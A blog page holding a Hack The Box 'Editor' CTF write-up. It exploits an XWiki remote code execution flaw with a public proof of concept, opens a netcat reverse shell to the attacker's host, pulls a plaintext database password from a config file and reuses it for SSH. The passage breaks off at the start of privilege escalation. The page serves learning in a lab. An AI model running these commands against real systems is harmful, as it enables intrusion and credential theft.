<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="NI8STALKER">
    
    <!-- Completely eliminate flash of wrong theme -->
    <script>
        (function() {
            const THEME_KEY = "REDEFINE-THEME-STATUS";
            const DARK = "dark", LIGHT = "light";
            
            // Get preferred theme
            function getTheme() {
                try {
                    const saved = localStorage.getItem(THEME_KEY);
                    if (saved) {
                        const { isDark } = JSON.parse(saved);
                        return isDark ? DARK : LIGHT;
                    }
                } catch (e) {}
                
                return matchMedia("(prefers-color-scheme: dark)").matches ? DARK : LIGHT;
            }
            
            // Apply theme to document
            function applyTheme(theme) {
                const isDark = theme === DARK;
                const root = document.documentElement;
                
                // Set data attribute for CSS variables
                root.setAttribute("data-theme", theme);
                
                // Set classes for compatibility
                root.classList.add(theme);
                root.classList.remove(isDark ? LIGHT : DARK);
                root.style.colorScheme = theme;
            }
            
            // Initial application
            const theme = getTheme();
            applyTheme(theme);
            
            // Listen for system preference changes
            matchMedia("(prefers-color-scheme: dark)").addEventListener("change", ({ matches }) => {
                // Only update if using system preference (no localStorage entry)
                if (!localStorage.getItem(THEME_KEY)) {
                    applyTheme(matches ? DARK : LIGHT);
                }
            });
            
            // Set body classes once DOM is ready
            if (document.readyState !== "loading") {
                document.body.classList.add(theme + "-mode");
            } else {
                document.addEventListener("DOMContentLoaded", () => {
                    document.body.classList.add(theme + "-mode");
                    document.body.classList.remove((theme === DARK ? LIGHT : DARK) + "-mode");
                });
            }
        })();
    </script>
    
    <!-- Critical CSS to prevent flash -->
    <style>
        :root[data-theme="dark"] {
            --background-color: #202124;
            --background-color-transparent: rgba(32, 33, 36, 0.6);
            --second-background-color: #2d2e32;
            --third-background-color: #34353a;
            --third-background-color-transparent: rgba(32, 33, 36, 0.6);
            --primary-color: #0066CC;
            --first-text-color: #ffffff;
            --second-text-color: #eeeeee;
            --third-text-color: #bebec6;
            --fourth-text-color: #999999;
            --default-text-color: #bebec6;
            --invert-text-color: #373D3F;
            --border-color: rgba(255, 255, 255, 0.08);
            --selection-color: #0066CC;
            --shadow-color-1: rgba(255, 255, 255, 0.08);
            --shadow-color-2: rgba(255, 255, 255, 0.05);
        }
        
        :root[data-theme="light"] {
            --background-color: #fff;
            --background-color-transparent: rgba(255, 255, 255, 0.6);
            --second-background-color: #f8f8f8;
            --third-background-color: #f2f2f2;
            --third-background-color-transparent: rgba(241, 241, 241, 0.6);
            --primary-color: #0066CC;
            --first-text-color: #16171a;
            --second-text-color: #2f3037;
            --third-text-color: #5e5e5e;
            --fourth-text-color: #eeeeee;
            --default-text-color: #373D3F;
            --invert-text-color: #bebec6;
            --border-color: rgba(0, 0, 0, 0.08);
            --selection-color: #0066CC;
            --shadow-color-1: rgba(0, 0, 0, 0.08);
            --shadow-color-2: rgba(0, 0, 0, 0.05);
        }
        
        body {
            background-color: var(--background-color);
            color: var(--default-text-color);
        }
        
        /* Apply body classes as soon as DOM is ready */
        :root[data-theme="dark"] body {
            background-color: var(--background-color);
            color: var(--default-text-color);
        }
    </style>
    
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2025/08/29/hackthebox-editor-2025/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="NI8STALKER, On the hunt for the next big thing">
<meta property="og:type" content="article">
<meta property="og:title" content="Hack The Box - Editor (2025) Writeup">
<meta property="og:url" content="http://example.com/2025/08/29/hackthebox-editor-2025/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="NI8STALKER, On the hunt for the next big thing">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/redefine-og.webp">
<meta property="article:published_time" content="2025-08-29T12:30:00.000Z">
<meta property="article:modified_time" content="2025-09-12T16:09:57.347Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Privilege Escalation">
<meta property="article:tag" content="Editor">
<meta property="article:tag" content="XWiki">
<meta property="article:tag" content="CVE-2025-24893">
<meta property="article:tag" content="Netdata">
<meta property="article:tag" content="CVE-2024-32019">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            Hack The Box - Editor (2025) Writeup | NI8STALKER
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":false,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"Recommended Reading","limit":3,"mobile_limit":2,"placeholder":"/images/pexels-iliescu-victor-95204-306198.jpg","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"single_page":true,"preloader":{"enable":false,"custom_message":null},"side_tools":{"gear_rotation":true,"auto_expand":false},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"NI8STALKER, On the hunt for the next big thing"},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/pexels-iliescu-victor-95204-306198.jpg","dark":"/images/pexels-negativespace-34153.jpg"},"title":"NI8STALKER","subtitle":{"text":[],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"github.com/selfi123","linkedin":"linkedin.com/in/abel-jorlin-812981230","email":"abelselfi12@gmail.com"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.5","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Status":{"path":"https://linkedin.com/in/abel-jorlin-812981230","icon":"fa-regular fa-chart-bar"},"About":{"icon":"fa-regular fa-user","submenus":{"Me":"/about","Portfolio":"/portfolio"}},"Links":{"icon":"fa-regular fa-link","submenus":{"Linkedin":"https://linkedin.com/in/abel-jorlin-812981230","Github":"https://github.com/selfi123","Instagram":"https://www.instagram.com/strrik_king_selfi/","Twitter":"https://x.com/abel_jorlin"}},"Pages":{"icon":"fa-regular fa-folder-open","submenus":{"Subtitle Search":"/pages/subtitle-search"}}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                NI8STALKER
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230"
                                        >
                                    <i class="fa-regular fa-chart-bar fa-fw"></i>
                                    STATUS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/about">
                                                    ME
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a href="/portfolio">
                                                    PORTFOLIO
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230">
                                                    LINKEDIN
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://github.com/selfi123">
                                                    GITHUB
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://www.instagram.com/strrik_king_selfi/">
                                                    INSTAGRAM
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://x.com/abel_jorlin">
                                                    TWITTER
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-folder-open fa-fw"></i>
                                    PAGES
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a href="/pages/subtitle-search">
                                                    SUBTITLE SEARCH
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230"
                        >
                            <span>
                                STATUS
                            </span>
                            
                                <i class="fa-regular fa-chart-bar fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-About"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-About">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/about">ME</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/portfolio">PORTFOLIO</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-Links"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-Links">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://linkedin.com/in/abel-jorlin-812981230">LINKEDIN</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://github.com/selfi123">GITHUB</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://www.instagram.com/strrik_king_selfi/">INSTAGRAM</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://x.com/abel_jorlin">TWITTER</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-Pages"
                        >
                            <span>
                                PAGES
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-Pages">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           href="/pages/subtitle-search">SUBTITLE SEARCH</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">30</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">2</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">7</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">Hack The Box - Editor (2025) Writeup</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/redefine-avatar.svg">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">NI8STALKER</span>
					
					<span class="author-label ml-1.5 text-xs px-2 py-0.5 rounded-small text-third-text-color border border-shadow-color-1">Lv1</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2025-08-29 18:00</span>
        <span class="mobile">2025-08-29 18:00</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-09-12 21:39:57</span>
            <span class="mobile">2025-09-12 21:39:57</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/HackTheBox/">HackTheBox</a>&nbsp;
                        </li>
                    
                    
                
                    
                        
                            <li>></li>
                        
                        <li>
                            <a href="/categories/HackTheBox/Writeups/">Writeups</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Privilege-Escalation/">Privilege Escalation</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Editor/">Editor</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/XWiki/">XWiki</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/CVE-2025-24893/">CVE-2025-24893</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Netdata/">Netdata</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/CVE-2024-32019/">CVE-2024-32019</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h1 id="Editor-Hack-The-Box-2025"><a href="#Editor-Hack-The-Box-2025" class="headerlink" title="Editor (Hack The Box) - 2025"></a>Editor (Hack The Box) - 2025</h1><blockquote>
<p>“Okay, so this one took me FOREVER to figure out. Like, I was stuck for hours on the dumbest things…”</p>
</blockquote>
<hr>
<h2 id="1-The-Usual-Start-Nmap-and-Confusion"><a href="#1-The-Usual-Start-Nmap-and-Confusion" class="headerlink" title="1. The Usual Start: Nmap and Confusion"></a>1. The Usual Start: Nmap and Confusion</h2><p>Alright, so I started with the basics. Added the IP to my hosts file:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;10.10.11.80 editor.htb&quot;</span> | <span class="built_in">sudo</span> <span class="built_in">tee</span> -a /etc/hosts</span><br></pre></td></tr></table></figure></div>

<p>Then ran my standard Nmap scan:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -sV -sC -Pn 10.10.11.80</span><br></pre></td></tr></table></figure></div>

<p>Got this:</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu</span><br><span class="line">80/tcp   open  http    nginx 1.18.0 (redirects to http://editor.htb/)</span><br><span class="line">8080/tcp open  http    Jetty 10.0.20 (XWiki with WebDAV enabled)</span><br></pre></td></tr></table></figure></div>

<p>Cool, so we have SSH, a web server, and something called XWiki on port 8080. I had NO idea what XWiki was at first, so I just started poking around.</p>
<hr>
<h2 id="2-Web-Enumeration-Getting-Lost-in-the-Sauce"><a href="#2-Web-Enumeration-Getting-Lost-in-the-Sauce" class="headerlink" title="2. Web Enumeration: Getting Lost in the Sauce"></a>2. Web Enumeration: Getting Lost in the Sauce</h2><p>I checked the main website first - nothing interesting, just a basic page. Then I went to port 8080 and saw this XWiki thing. It looked like some kind of wiki&#x2F;documentation system.</p>
<p>I spent like 30 minutes trying to find login pages, looking for default credentials, checking robots.txt… basically doing everything except the right thing. I even tried some basic SQL injection attempts (spoiler: didn’t work).</p>
<p>Then I noticed at the bottom of the page it said “XWiki Version: 15.10.8”. I was like, “Hmm, maybe I should check if this version has any known vulnerabilities?”</p>
<hr>
<h2 id="3-The-Google-Rabbit-Hole"><a href="#3-The-Google-Rabbit-Hole" class="headerlink" title="3. The Google Rabbit Hole"></a>3. The Google Rabbit Hole</h2><p>So I googled “XWiki 15.10.8 vulnerability” and found this CVE-2025-24893 thing. Apparently it affects versions before 15.10.11, and mine was 15.10.8, so it should be vulnerable!</p>
<p>I found a PoC on GitHub and was super excited:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/gunzf0x/CVE-2025-24893</span><br><span class="line"><span class="built_in">cd</span> CVE-2025-24893</span><br></pre></td></tr></table></figure></div>

<p>But then I read the README and realized I needed to understand how this exploit worked. It was like 2 AM and I was getting frustrated because I kept messing up the syntax.</p>
<hr>
<h2 id="4-First-Attempts-Epic-Fail"><a href="#4-First-Attempts-Epic-Fail" class="headerlink" title="4. First Attempts: Epic Fail"></a>4. First Attempts: Epic Fail</h2><p>I tried running the exploit like 5 different ways and kept getting errors. I was like “Why isn’t this working??” </p>
<p>Finally, I figured out the right syntax (after reading the help like 10 times):</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 CVE-2025-24893.py -t http://editor.htb:8080/ -c <span class="string">&#x27;busybox nc 10.10.14.25 4444 -e /bin/bash&#x27;</span></span><br></pre></td></tr></table></figure></div>

<p>I had my netcat listener ready:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc -lnvp 4444</span><br></pre></td></tr></table></figure></div>

<p>And BOOM! I got a shell! I was so hyped, you have no idea. I immediately upgraded it to a proper PTY:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">&#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span></span><br></pre></td></tr></table></figure></div>

<hr>
<h2 id="5-The-User-Hunt-Where’s-Oliver"><a href="#5-The-User-Hunt-Where’s-Oliver" class="headerlink" title="5. The User Hunt: Where’s Oliver?"></a>5. The User Hunt: Where’s Oliver?</h2><p>So I’m in as the <code>xwiki</code> user, but I need to find the user flag. I checked <code>/home</code> and saw there was a user called <code>oliver</code>:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> /home</span><br><span class="line"><span class="built_in">ls</span></span><br><span class="line"><span class="comment"># Output: oliver</span></span><br></pre></td></tr></table></figure></div>

<p>I tried to access his directory but got permission denied. I was like “Okay, I need to find his password somehow.”</p>
<p>I started looking through config files, and honestly, I was about to give up when I found this in the XWiki config:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml | grep password</span><br></pre></td></tr></table></figure></div>

<p>There it was:</p>
<div class="code-container" data-rel="Xml"><figure class="iseeu highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">property</span> <span class="attr">name</span>=<span class="string">&quot;hibernate.connection.password&quot;</span>&gt;</span>theEd1t0rTeam99<span class="tag">&lt;/<span class="name">property</span>&gt;</span></span><br></pre></td></tr></table></figure></div>

<p>I was like “This HAS to be oliver’s password, right?” So I tried SSH:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh oliver@editor.htb</span><br></pre></td></tr></table></figure></div>

<p>And it worked! I was so relieved.</p>
<hr>
<h2 id="6-User-Flag-Finally"><a href="#6-User-Flag-Finally" class="headerlink" title="6. User Flag: Finally!"></a>6. User Flag: Finally!</h2><p>Once I was in as oliver, I found the user flag immediately:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ls</span></span><br><span class="line"><span class="comment"># Output: user.txt</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> user.txt</span><br><span class="line"><span class="comment"># Output: *********************</span></span><br></pre></td></tr></table></figure></div>

<p>One down, one to go!</p>
<hr>
<h2 id="7-Privilege-Escalation-The-Real-Struggle"><a href="#7-Privilege-Escalation-The-Real-Struggle" class="headerlink" title="7. Privilege Escalation: The Real Struggle"></a>7. Privilege Escalation: The Real Struggle</h2><p>Now for the hard part - getting root. I started with the usual stuff:</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -<span class="built_in">type</span> f -perm -4000 -user root 2&gt;/dev/null</span><br></pre></td></tr></table></figure></div>

<p>I found this weird thing:</p>
